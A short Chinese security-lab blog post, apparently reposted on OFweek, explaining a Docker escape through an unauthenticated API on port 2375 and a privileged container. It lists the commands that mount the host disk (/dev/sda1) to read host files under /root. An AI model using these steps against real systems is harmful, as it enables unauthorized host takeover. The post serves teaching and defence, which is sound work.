美創(chuàng)安全實驗室 | Docker逃逸原理
2020-07-31 17:50
美創(chuàng)科技
關(guān)注
Docker逃逸實驗(特權(quán)模式+目錄掛載)
目標機:192.168.210.37
目標機上對外開啟了Docker服務,運行在2375端口上。直接訪問目標機的2375端口即可未授權(quán)查看Docker信息,如下:
查看當前docker中存在的所有容器:docker images
使用特權(quán)模式啟動容器
查看磁盤文件:fdisk -l
從返回結(jié)果來看sda1、sda2、sda3在/dev目錄下。
新建一個目錄/test,然后將/dev/sda1掛載到新建的目錄下
mkdir /test
mount /dev/sda1 /test
這時再查看新建的目錄/test,就可以訪問宿主機上的目錄內(nèi)容了(/root目錄下的內(nèi)容)

聲明:
本文由入駐維科號的作者撰寫,觀點僅代表作者本人,不代表OFweek立場。如有侵權(quán)或其他問題,請聯(lián)系舉報。
請輸入評論內(nèi)容...
請輸入評論/評論長度6~500個字
圖片新聞